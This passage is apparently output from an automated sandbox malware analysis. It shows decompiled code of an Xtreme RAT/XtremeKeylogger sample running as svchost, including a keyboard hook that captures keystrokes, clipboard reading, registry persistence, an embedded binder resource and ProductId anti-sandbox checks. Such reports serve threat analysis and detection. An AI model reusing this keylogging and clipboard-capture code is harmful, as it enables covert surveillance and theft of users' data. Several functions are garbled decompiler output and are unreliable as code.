				if (_t20 >= 0) goto L1;
				if (_t20 == 0) goto L2;
				_push(_t13);
				 *__ecx =  *__ecx + __ecx;
				if ( *__ecx != 0) goto L3;
				 *[gs:eax] =  *[gs:eax] + __eax;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t13 - 0x4d)) =  *((intOrPtr*)(_t13 - 0x4d)) + __edx;
				_push(_t13);
				_t14 = 1;
				if(GetKeyState(0x14) != 1 || GetKeyState(0x10) >= 0) {
					if(GetKeyState(0x14) != 1 || GetKeyState(0x10) < 0) {
						if(GetKeyState(0x14) == 1 || GetKeyState(0x10) >= 0) {
							if(GetKeyState(0x14) != 1 && GetKeyState(0x10) >= 0) {
								_t14 = 1;
							}
						} else {
							_t14 = 0;
						}
					} else {
						_t14 = 0;
					}
				} else {
					_t14 = 1;
				}
				return _t14;
			}

APIs

GetKeyState.USER32(00000014), ref: 00C854F1
GetKeyState.USER32(00000010), ref: 00C854FE
GetKeyState.USER32(00000014), ref: 00C8550E
GetKeyState.USER32(00000010), ref: 00C8551B
GetKeyState.USER32(00000014), ref: 00C8552B
GetKeyState.USER32(00000010), ref: 00C85538
GetKeyState.USER32(00000014), ref: 00C85548
GetKeyState.USER32(00000010), ref: 00C85555

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C86748, Relevance: 10.6, APIs: 7, Instructions: 73
windowthread

C-Code - Quality: 47%

			E00C86748(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v20;
				char _v24;
				struct HKL__* _v28;
				char _v284;
				intOrPtr _v288;
				char _v292;
				struct HHOOK__* _t21;
				int _t35;
				struct HWND__* _t36;
				long _t40;
				void* _t51;

				_push(_t51);
				_push(0xc8683a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t51 + 0xfffffee0;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 == 0 && (_a8 == 0x104 || _a8 == 0x100)) {
					E00C8291C();
					GetKeyboardState( &_v284);
					_v28 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(), 0));
					_v292 = _v24;
					_v288 = _v20;
					_t40 = VirtualAlloc(0, 0x10c, 0x1000, 0x40);
					E00C82914(_t40,  &_v292);
					_t35 =  *0xc8decc; // 0xc1f1
					_t36 =  *0xc8b0b4; // 0x0
					SendMessageA(_t36, _t35, 0x10c, _t40);
				}
				_pop( *[fs:0x0]);
				_push(E00C86841);
				_t21 =  *0xc8b0c4; // 0x0
				return CallNextHookEx(_t21, _a4, _a8, _a12);
			}

APIs

GetKeyboardState.USER32(?), ref: 00C867A6
GetForegroundWindow.USER32 ref: 00C867AB
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C867B3
GetKeyboardLayout.USER32(00000000), ref: 00C867BB
VirtualAlloc.KERNEL32(00000000,0000010C,00001000,00000040,00000000,00C8683A), ref: 00C867E3
SendMessageA.USER32(00000000,0000C1F1,0000010C,00000000), ref: 00C8680E
CallNextHookEx.USER32(00000000,?,?,?), ref: 00C86834

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C853EC, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 65
registry

C-Code - Quality: 50%

			E00C853EC(char __eax, void* __ebx, void* __esi) {
				void* _v8;
				char _v12;
				int* _v16;
				char _v20;
				intOrPtr _t39;
				char _t43;
				void* _t46;

				_v20 = 0;
				_v16 = 0;
				_t43 = __eax;
				_push(_t46);
				_push(0xc854aa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff0;
				_push(L"SOFTWARE\\");
				E00C81CD8( &_v20, 0xb, 0xc8d9bc);
				_push(_v20);
				_push(E00C854D4);
				E00C81D74();
				if(RegCreateKeyExW(0x80000001, E00C81CF4(_v16), 0, 0, 0, 0x20006, 0,  &_v8, 0) == 0) {
					_v12 = _t43;
					RegSetValueExW(_v8, L"LastSize", 0, 4,  &_v12, 4);
					RegCloseKey(_v8);
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E00C854B1);
				return E00C81B90( &_v20, 2);
			}

APIs

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

LastSize, xrefs: 00C85478
XtremeKeylogger, xrefs: 00C853F2
SOFTWARE\, xrefs: 00C8540E

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C852E8, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63
registry

C-Code - Quality: 50%

			E00C852E8(void* __ebx) {
				void* _v8;
				char _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				intOrPtr _t44;
				void* _t48;

				_v28 = 0;
				_v24 = 0;
				_push(_t48);
				_push(0xc853aa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48 + 0xffffffe8;
				_push(L"SOFTWARE\\");
				E00C81CD8( &_v28, 0xb, 0xc8d9bc);
				_push(_v28);
				_push(0xc853d4);
				E00C81D74();
				if(RegOpenKeyExW(0x80000001, E00C81CF4(_v24), 0, 0x20019,  &_v8) == 0) {
					_v20 = 4;
					_v16 = 4;
					if(RegQueryValueExW(_v8, L"LastSize", 0,  &_v20,  &_v12,  &_v16) == 0) {
					}
					RegCloseKey(_v8);
				}
				_pop(_t44);
				 *[fs:eax] = _t44;
				_push(E00C853B1);
				return E00C81B90( &_v28, 2);
			}

APIs

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA,?,XtremeKeylogger), ref: 00C8534C
RegQueryValueExW.ADVAPI32(?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA), ref: 00C8537A
RegCloseKey.ADVAPI32(?,?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000), ref: 00C8538A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

SOFTWARE\, xrefs: 00C85307
XtremeKeylogger, xrefs: 00C852EE
LastSize, xrefs: 00C85371

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C87348, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
registry

C-Code - Quality: 100%

			E00C87348(WCHAR* __eax, intOrPtr __edx) {
				char _v52;
				int _v56;
				int _v60;
				WCHAR* _t14;
				struct HINSTANCE__* _t17;
				WNDCLASSW* _t33;
				WCHAR* _t34;
				struct tagRECT* _t35;

				_t14 = __eax;
				_t35 =  &_v56;
				_t33 =  &_v52;
				_t33->style = 0;
				if(__edx != 0) {
					 *((intOrPtr*)(_t33 + 4)) = __edx;
				} else {
					 *((intOrPtr*)(_t33 + 4)) = E00C8732C;
				}
				_t33->cbClsExtra = 0;
				_t33->cbWndExtra = 0;
				_t33->hInstance = 0;
				_t33->hIcon = 0;
				_t33->hCursor = 0;
				_t33->hbrBackground = 0;
				_t33->lpszMenuName = 0;
				_t34 = _t14;
				_t33->lpszClassName = _t34;
				GetWindowRect(GetDesktopWindow(), _t35);
				_t17 = GetModuleHandleA(0);
				RegisterClassW(_t33);
				return CreateWindowExW(0x80, _t34, E00C873DC, 0x98000000, _v60, _v56, 0, 0, 0, 0, _t17, 0);
			}

APIs

GetDesktopWindow.USER32 ref: 00C87390
GetWindowRect.USER32(00000000), ref: 00C87396
GetModuleHandleA.KERNEL32(00000000), ref: 00C8739D
RegisterClassW.USER32(?), ref: 00C873A5
CreateWindowExW.USER32(00000080,XtremeKeylogger,00C873DC,98000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C873CF

Strings

XtremeKeylogger, xrefs: 00C87348, 00C873C9

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8406C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44

C-Code - Quality: 100%

			E00C8406C(intOrPtr* __eax) {
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				struct HRSRC__* _t17;
				void* _t18;
				intOrPtr* _t23;
				unsigned int _t25;

				_t23 = __eax;
				E00C81B78(__eax);
				_t4 =  *0xc8c670; // 0xc80000
				_t17 = FindResourceW(_t4, L"XTREMEBINDER", 0xa);
				_t6 =  *0xc8c670; // 0xc80000
				_t25 = SizeofResource(_t6, _t17);
				_t8 =  *0xc8c670; // 0xc80000
				_t18 = LoadResource(_t8, _t17);
				_t10 = LockResource(_t18);
				_t24 = _t10;
				if(_t10 != 0) {
					E00C81F6C(_t23, _t25 >> 1);
					E00C82914(E00C81CF4( *_t23), _t24);
					return FreeResource(_t18);
				}
				return _t10;
			}

0x00c84070
0x00c84074
0x00c84080
0x00c8408b
0x00c8408e
0x00c84099
0x00c8409c
0x00c840a7
0x00c840aa
0x00c840af
0x00c840b3
0x00c840bb
0x00c840cb
0x00000000
0x00c840d1
0x00c840da

APIs

Part of subcall function 00C81B78: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86

FindResourceW.KERNEL32(00C80000,XTREMEBINDER,0000000A), ref: 00C84086
SizeofResource.KERNEL32(00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A,?,00000000,00000001,00000000), ref: 00C84094
LoadResource.KERNEL32(00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A,?,00000000), ref: 00C840A2
LockResource.KERNEL32(00000000,00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A), ref: 00C840AA
FreeResource.KERNEL32(00000000,00000000,00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A), ref: 00C840D1

Strings

XTREMEBINDER, xrefs: 00C8407B

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C88324, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
registry

C-Code - Quality: 100%

			E00C88324() {
				char _v264;
				int _v268;
				void* _v272;
				int _t15;

				_t15 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
					if( &_v264 == "55274-640-2673064-23950") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}

0x00c8832b
0x00c88343
0x00c88345
0x00c88365
0x00c88373
0x00c88375
0x00c88375
0x00c88373
0x00c8837b
0x00c88389

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8833C
RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C88365
RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8837B

Strings

ProductId, xrefs: 00C8835B
55274-640-2673064-23950, xrefs: 00C8836E
Software\Microsoft\Windows\CurrentVersion, xrefs: 00C88332

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C883DC, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
registry

C-Code - Quality: 100%

			E00C883DC() {
				char _v264;
				int _v268;
				void* _v272;
				int _t15;

				_t15 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
					if( &_v264 == "76487-644-3177037-23510") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}

0x00c883e3
0x00c883fb
0x00c883fd
0x00c8841d
0x00c8842b
0x00c8842d
0x00c8842d
0x00c8842b
0x00c88433
0x00c88441

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C883F4
RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8841D
RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C88433

Strings

ProductId, xrefs: 00C88413
76487-644-3177037-23510, xrefs: 00C88426
Software\Microsoft\Windows\CurrentVersion, xrefs: 00C883EA

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C88494, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
registry

C-Code - Quality: 100%

			E00C88494() {
				char _v264;
				int _v268;
				void* _v272;
				int _t15;

				_t15 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
					if( &_v264 == "76487-337-8429955-22614") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}

0x00c8849b
0x00c884b3
0x00c884b5
0x00c884d5
0x00c884e3
0x00c884e5
0x00c884e5
0x00c884e3
0x00c884eb
0x00c884f9

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884AC
RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884D5
RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884EB

Strings

76487-337-8429955-22614, xrefs: 00C884DE
ProductId, xrefs: 00C884CB
Software\Microsoft\Windows\CurrentVersion, xrefs: 00C884A2

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C83094, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32

C-Code - Quality: 100%

			E00C83094() {
				WCHAR* _t9;
				short* _t11;
				void* _t12;

				_t9 = E00C833A8(E00C82FE0(), L"x.html", _t12);
				CloseHandle(CreateFileW(_t9, 0x40000000, 2, 0, 2, 0x80, 0));
				_t11 = VirtualAlloc(0, 0x208, 0x1000, 4);
				FindExecutableW(_t9, 0, _t11);
				DeleteFileW(_t9);
				return _t11;
			}

0x00c830a5
0x00c830c0
0x00c830d8
0x00c830de
0x00c830e4
0x00c830ed

APIs

Part of subcall function 00C82FE0: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C849F0,00000000,00C84B74,?,00C8E07C,00000000,00000000), ref: 00C82FEF
Part of subcall function 00C82FE0: GetTempPathW.KERNEL32(00000104,00000000), ref: 00C82FFC

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
CloseHandle.KERNEL32(00000000), ref: 00C830C0
VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

Strings

x.html, xrefs: 00C8309B

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8389C, Relevance: 9.1, APIs: 6, Instructions: 70
clipboard

C-Code - Quality: 65%

			E00C8389C(struct HWND__* __eax, intOrPtr* __ecx, void** __edx) {
				char _v5;
				void* _v12;
				void* _t20;
				intOrPtr* _t28;
				intOrPtr _t38;
				void** _t42;
				void* _t48;
				void* _t50;
				intOrPtr _t51;

				_t48 = _t50;
				_t51 = _t50 + 0xfffffff8;
				_t28 = __ecx;
				_t42 = __edx;
				_v5 = 1;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				if(OpenClipboard(__eax) == 0) {
					_v5 = 0;
					return _v5;
				} else {
					_push(_t48);
					_push(0xc83949);
					_push( *[fs:eax]);
					 *[fs:eax] = _t51;
					_v12 = GetClipboardData(0xd);
					if(_v12 == 0) {
						_v5 = 0;
						_pop(_t38);
						 *[fs:eax] = _t38;
						_push(0xc83954);
						return CloseClipboard();
					} else {
						_push(_t48);
						_push(0xc8392b);
						_push( *[fs:eax]);
						 *[fs:eax] = _t51;
						_t20 = _v12;
						GlobalFix(_t20);
						 *_t42 = _t20;
						 *_t28 = GlobalSize(_v12) - 2;
						 *((intOrPtr*)(_t28 + 4)) = 0;
						 *[fs:eax] = 0;
						_push(0xc83936);
						return GlobalUnWire(_v12);
					}
				}
			}

APIs

OpenClipboard.USER32 ref: 00C838BD
GetClipboardData.USER32(0000000D), ref: 00C838DA
GlobalFix.KERNEL32(00000000), ref: 00C838FA
GlobalSize.KERNEL32(00000000), ref: 00C83905
GlobalUnWire.KERNEL32(00000000), ref: 00C83925
CloseClipboard.USER32 ref: 00C83943

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C835DC, Relevance: 9.1, APIs: 6, Instructions: 58
file

C-Code - Quality: 100%

			E00C835DC(WCHAR* __eax, void** __edx) {
				long _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				WCHAR* _t18;
				void* _t19;
				long _t23;
				void** _t24;

				_t24 = __edx;
				_t18 = __eax;
				_v24 = 0;
				_v20 = 0;
				if(E00C835B0(__eax) != 0) {
					_t19 = CreateFileW(_t18, 0x80000000, 1, 0, 3, 0, 0);
					if(_t19 != 0xffffffff) {
						_v24 = GetFileSize(_t19, 0);
						_v20 = 0;
						_t23 = _v24;
						 *_t24 = VirtualAlloc(0, _t23, 0x1000, 4);
						SetFilePointer(_t19, 0, 0, 0);
						ReadFile(_t19,  *_t24, _t23,  &_v16, 0);
					}
					CloseHandle(_t19);
				}
				return _v24;
			}

0x00c835e2
0x00c835e4
0x00c835e6
0x00c835ed
0x00c835fe
0x00c83615
0x00c8361a
0x00c83626
0x00c83629
0x00c83634
0x00c83640
0x00c83649
0x00c8365a
0x00c8365a
0x00c83660
0x00c83660
0x00c83672

APIs

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C83610
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8361F
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8363B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C83649
ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C8365A
CloseHandle.KERNEL32(00000000), ref: 00C83660

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C855E2, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 305
keyboard

C-Code - Quality: 43%

			E00C855E2(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, signed int __esi) {
				signed char _t37;
				intOrPtr* _t39;
				void* _t40;
				intOrPtr* _t42;
				int _t69;
				int _t73;
				signed char _t97;
				int _t98;
				signed int _t100;
				void* _t111;
				intOrPtr _t113;
				void* _t130;
				intOrPtr* _t131;
				int _t141;
				int _t143;
				void* _t146;
				void* _t148;
				void* _t149;

				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__ecx =  *__ecx + __ecx;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *0x491f0000 =  *0x491f0000 + __eax;
				asm("sbb ecx, [esi+0x4a]");
				_t37 = __eax & 0x0000003e;
				_push(_t146);
				_push(_t37);
				_push(es);
				asm("aas");
				_t97 = __ebx +  *0x18000000 + 0x00000001 &  *__ecx &  *0;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *((intOrPtr*)(_t97 + 8)) =  *((intOrPtr*)(_t97 + 8)) + __edx;
				 *__edx =  *__edx | __ecx;
				_t100 = __ecx |  *(__ecx + 0x11100f0e);
				es = _t149;
				 *__edx =  *__edx + _t97;
				asm("sbb al, 0x3");
				 *__esi =  *__esi ^ __edx;
				asm("aaa");
				asm("daa");
				 *_t100 =  *_t100 - _t100;
				_t39 = _t37 + 0x25 - 0x2d;
				asm("das");
				 *__edx =  *__edx ^ __esi;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				_t98 = _t97 - 1;
				_push(__edx);
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				_t111 = __edx + 1;
				_t130 = __edi - 1;
				_push(_t100 -  *_t97);
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *((intOrPtr*)(_t130 + 0x56)) =  *((intOrPtr*)(_t130 + 0x56)) + _t111;
				_pop(_t40);
				_t148 = _t146 - 1 + 1;
				_t131 = _t130 + 1;
				_t42 = _t40 - 1 + 1;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t131 =  *_t131 + _t111;
				 *_t42 =  *_t42 + _t42;
				 *0 =  *0 + _t111;
				 *_t42 =  *_t42 + _t42;
				 *((intOrPtr*)(_t98 + _t111)) =  *((intOrPtr*)(_t98 + _t111)) + _t111;
				 *_t42 =  *_t42 + _t42;
				asm("adc al, [eax]");
				 *_t42 =  *_t42 + _t42;
				 *((intOrPtr*)((__esi ^  *__esi) + 1)) =  *((intOrPtr*)((__esi ^  *__esi) + 1)) + _t111;
				_push(ds);
				asm("repne pop ebp");
				asm("enter 0x3a00, 0x58");
				asm("enter 0x4b00, 0x58");
				asm("enter 0x5c00, 0x58");
				asm("enter 0x6d00, 0x58");
				asm("enter 0x7e00, 0x58");
				asm("enter 0x8f00, 0x58");
				asm("enter 0xa000, 0x58");
				asm("enter 0xb100, 0x58");
				asm("enter 0xc200, 0x58");
				asm("enter 0xd300, 0x58");
				asm("enter 0xe400, 0x58");
				asm("enter 0xf500, 0x58");
				asm("enter 0x600, 0x59");
				asm("enter 0x1700, 0x59");
				asm("enter 0x2800, 0x59");
				asm("enter 0x3900, 0x59");
				asm("enter 0x4a00, 0x59");
				asm("enter 0x5b00, 0x59");
				asm("enter 0x6c00, 0x59");
				asm("enter 0x7d00, 0x59");
				asm("enter 0x8e00, 0x59");
				asm("enter 0x9f00, 0x59");
				asm("enter 0xb000, 0x59");
				asm("enter 0xc100, 0x59");
				asm("enter 0xd200, 0x59");
				asm("enter 0xe300, 0x59");
				asm("enter 0xf400, 0x59");
				asm("enter 0x500, 0x5a");
				asm("enter 0x1600, 0x5a");
				asm("enter 0x2700, 0x5a");
				asm("enter 0x3800, 0x5a");
				asm("enter 0x4900, 0x5a");
				asm("enter 0x5a00, 0x5a");
				asm("enter 0x6b00, 0x5a");
				asm("enter 0x7c00, 0x5a");
				asm("enter 0x8d00, 0x5a");
				asm("enter 0x9e00, 0x5a");
				asm("enter 0xaf00, 0x5a");
				asm("enter 0xc000, 0x5a");
				asm("enter 0xd100, 0x5a");
				asm("enter 0xe200, 0x5a");
				asm("enter 0xf300, 0x5a");
				asm("enter 0x400, 0x5b");
				asm("enter 0x1500, 0x5b");
				asm("enter 0x2600, 0x5b");
				asm("enter 0x3700, 0x5b");
				asm("enter 0x4800, 0x5b");
				asm("enter 0x5900, 0x5b");
				asm("enter 0x6a00, 0x5b");
				asm("enter 0x7b00, 0x5b");
				asm("enter 0x8c00, 0x5b");
				asm("enter 0x9d00, 0x5b");
				asm("enter 0xae00, 0x5b");
				asm("enter 0xbf00, 0x5b");
				asm("enter 0xd000, 0x5b");
				asm("enter 0xe100, 0x5b");
				asm("enter 0xf200, 0x5b");
				asm("enter 0x300, 0x5c");
				asm("enter 0x1400, 0x5c");
				asm("enter 0x2500, 0x5c");
				asm("enter 0x3600, 0x5c");
				asm("enter 0x4700, 0x5c");
				asm("enter 0x5800, 0x5c");
				asm("enter 0x6900, 0x5c");
				asm("enter 0x7a00, 0x5c");
				asm("enter 0x8b00, 0x5c");
				asm("enter 0x9c00, 0x5c");
				asm("enter 0xad00, 0x5c");
				asm("enter 0xbe00, 0x5c");
				asm("enter 0xcf00, 0x5c");
